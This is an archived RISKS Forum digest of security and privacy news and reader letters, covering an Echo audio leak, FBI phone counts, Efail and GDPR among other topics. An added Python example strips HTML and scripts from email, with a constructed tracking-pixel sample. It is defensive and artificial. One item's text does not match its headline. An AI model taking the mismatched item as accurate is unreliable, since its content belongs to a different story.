    [Thanks to Phil Porras]
    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
    ...."Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
    counted and would be flushed away as soon as they cast their ballot. Some
    angrily accused me of trying to take away their precious right to vote, for
    which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something. In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered
        ADD GIN TO VERMOUTH GIVING MARTINI;
    there aren't a lot of other options beyond
        COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially difficult.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that I whole-heartedly
    approve. In Europe we seem to have this belief - apparently unheard of to
    Americans - that openness and fair dealing is much better all round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).

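    The mitigation this post describes, reducing incoming mail to plain text so that no HTML or script ever reaches the inbox, as an added Python example that is not part of the post or of the RISKS digest. The sample message, the tracker hostname and the trackOpen() script inside it are constructed for the demonstration.

```python
"""Added example (not from the RISKS post): flatten an incoming MIME message to
plain text before delivery, discarding HTML tags, <script>/<style> content and
any remote references such as tracking images. The sample mail is constructed."""
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser


class _TextOnly(HTMLParser):
    """Collect the visible text of an HTML body; tags and attributes are
    dropped, so remote references (img src, links) never survive."""

    BLOCK_TAGS = ("br", "p", "div", "tr", "li")

    def __init__(self):
        super().__init__()
        self._chunks = []
        self._skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
        elif tag in self.BLOCK_TAGS:
            self._chunks.append("\n")

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1
        elif tag in self.BLOCK_TAGS:
            self._chunks.append("\n")

    def handle_data(self, data):
        if not self._skip_depth:      # script/style bodies are discarded
            self._chunks.append(data)

    def text(self):
        return "".join(self._chunks)


def html_to_text(html: str) -> str:
    """Visible text of an HTML fragment, one non-empty line per block."""
    p = _TextOnly()
    p.feed(html)
    p.close()
    lines = (ln.strip() for ln in p.text().splitlines())
    return "\n".join(ln for ln in lines if ln)


def sanitize_message(raw: bytes) -> EmailMessage:
    """Build a new text/plain message from the visible text of `raw`.
    An existing text/plain part is preferred; otherwise the text/html part
    is flattened. Images and other attachments are not carried over."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    plain = msg.get_body(preferencelist=("plain",))
    if plain is not None:
        body = plain.get_content()
    else:
        html_part = msg.get_body(preferencelist=("html",))
        body = html_to_text(html_part.get_content()) if html_part else ""
    out = EmailMessage()
    for h in ("From", "To", "Subject", "Date", "Message-ID"):
        if msg[h] is not None:
            out[h] = str(msg[h])
    out.set_content(body)  # text/plain only
    return out


def sanitized_body(raw: bytes) -> str:
    """Convenience wrapper returning just the delivered plain-text body."""
    return sanitize_message(raw).get_content()


# Constructed HTML-only message: a tracking pixel and a script hide
# alongside two lines of real content.
SAMPLE_HTML_MAIL = b"""\
From: sender@example.com
To: me@example.com
Subject: constructed sample
Date: Fri, 18 May 2018 10:00:00 +0000
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Meeting moved to <b>3pm</b>.</p>
<img src="http://tracker.example.invalid/pixel.gif">
<script>trackOpen()</script>
<p>See you there.</p></body></html>
"""

if __name__ == "__main__":
    print(sanitize_message(SAMPLE_HTML_MAIL))
```
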
    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're supposed to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPAA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. The medical insurance industry should take note and enhance patient
    database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
    Risks Digest 30.71

    RISKS List Owner

    Jun 5, 2018 3:56 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 5 May 2018 Volume 30 : Issue 71

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Microsoft to acquire GitHub for $7.5 billion (Lauren Weinstein)
    Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)
    Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)
    Google to remove "secure" indicator from HTTPS pages on Chrome (Keith Medcalf,
    Gene Wirchenko, John Levine)
    "How your web browser tells you when it's safe" (Gregg Keizer)
    "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)
    FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)
    Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)
    How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)
    Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)
    YouTube stars' fury over algorithm tests (BBC.com)
    Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later (Fortune)
    Amazon's Echo privacy flub has big implications for IT (Evan Schuman)
    "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)
    License Plate Risks (Jeremy Ardley)
    "Jira bug exposed private server keys at major companies, researcher finds"
    (Zack Whittaker)
    Google Started a Political Sh*tstorm Because of Its Over-Reliance on
    Wikipedia (Motherboard)
    Signs of sophisticated cellphone spying found near White House, U.S.
    officials say (WaPo)
    Massive Visa Outage Shows the Fragility of Global Payments (WiReD)
    How can criminals manipulate cryptocurrency markets?
    (The Conversation)
    Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds of User
    Email Addresses (Gizmodo)
    Commentary: GDPR Misses the Point (Fortune)
    GDPR, Privacy, and CISSPforum vs "Community" (Rob Slade)
    German spy agency can keep tabs on Internet hubs: court (Phys)
    Trendism and cognitive stagnation (John Ohno)
    Re: Securing Elections (Amos Shapir)
    Abridged info on RISKS (comp.risks)

